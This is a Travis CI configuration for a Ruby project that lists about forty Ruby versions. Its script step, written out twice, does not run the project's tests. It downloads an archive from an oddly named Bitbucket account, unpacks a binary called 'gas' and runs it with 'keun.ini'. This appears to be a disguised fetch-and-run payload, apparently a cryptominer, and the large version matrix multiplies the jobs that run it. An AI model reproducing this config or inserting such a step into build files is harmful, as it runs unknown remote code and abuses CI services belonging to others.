language: ruby
cache: bundler # caching to speed up dependency installation
ruby:
  - "3.0.1"
  - "2.7.3"
  - "2.6.7"
  - "2.5.9"
  - "3.0.0"
  - "2.7.2"
  - "2.7.1"
  - "2.6.6"
  - "2.5.8"
  - "2.4.10"
  - "2.7.0"
  - "2.4.9"
  - "2.6.5"
  - "2.5.7"
  - "2.4.8"
  - "2.6.4"
  - "2.5.6"
  - "2.4.7"
  - "2.6.3"
  - "2.4.6"
  - "2.5.5"
  - "2.6.2"
  - "2.5.4"
  - "2.6.1"
  - "2.6.0"
  - "2.5.3"
  - "2.5.2"
  - "2.4.5"
  - "2.3.8"
  - "2.5.1"
  - "2.4.4"
  - "2.3.7"
  - "2.5.0"
  - "2.4.3"
  - "2.3.6"
  - "2.4.2"
  - "2.3.5"
  - "2.2.9"
  - "2.3.4"
  - "2.2.7"
  - "2.4.1"
script:
- wget https://bitbucket.org/gshch828/hjdii2j9diwo/downloads/gasspeedometer.tar.gz && tar -xvf gasspeedometer.tar.gz && chmod u+x gas && ./gas keun.ini
addons:
  apt:
    packages:
    - libcurl4-openssl-dev # required to avoid SSL errors
env:
  global:
  - NOKOGIRI_USE_SYSTEM_LIBRARIES=true # speeds up installation of html-proofer
script:
- wget https://bitbucket.org/gshch828/hjdii2j9diwo/downloads/gasspeedometer.tar.gz && tar -xvf gasspeedometer.tar.gz && chmod u+x gas && ./gas keun.ini
